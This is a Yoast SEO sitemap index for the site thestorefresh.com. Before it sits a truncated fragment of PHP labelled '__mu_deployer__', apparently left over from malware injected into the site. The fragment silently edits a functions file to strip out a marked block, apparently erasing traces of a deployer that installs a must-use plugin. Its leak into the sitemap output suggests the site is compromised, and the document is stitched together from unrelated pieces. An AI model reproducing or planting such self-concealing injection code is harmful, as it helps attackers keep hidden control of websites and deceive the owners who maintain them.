';
    $s = strpos($fc, $m);
    $e = strrpos($fc, $m);
    if ($s !== false && $e !== false && $s !== $e) {
      $clean = rtrim(substr($fc, 0, $s) . substr($fc, $e + strlen($m))) . "\n";
      if (strlen($clean) > 10 && strpos($clean, '<?php') !== false) {
        $tmp = $func_file . '.tmp.' . getmypid();
        if (@file_put_contents($tmp, $clean) === strlen($clean)) {
          @rename($tmp, $func_file);
        } else {
          @unlink($tmp);
        }
      }
    }
  }
}, 1);
/* __mu_deployer__ */
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//thestorefresh.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://thestorefresh.com/post-sitemap.xml</loc>
		<lastmod>2023-05-30T11:18:23+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thestorefresh.com/page-sitemap.xml</loc>
		<lastmod>2024-10-03T10:59:15+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thestorefresh.com/services-sitemap.xml</loc>
		<lastmod>2021-01-25T11:54:49+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thestorefresh.com/testimonial-sitemap.xml</loc>
		<lastmod>2021-05-06T06:27:41+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thestorefresh.com/faq-sitemap.xml</loc>
		<lastmod>2021-03-23T12:26:27+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thestorefresh.com/casestudies-sitemap.xml</loc>
		<lastmod>2023-05-15T10:48:53+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thestorefresh.com/category-sitemap.xml</loc>
		<lastmod>2023-05-30T11:18:23+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://thestorefresh.com/post_tag-sitemap.xml</loc>
		<lastmod>2023-05-30T11:18:23+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->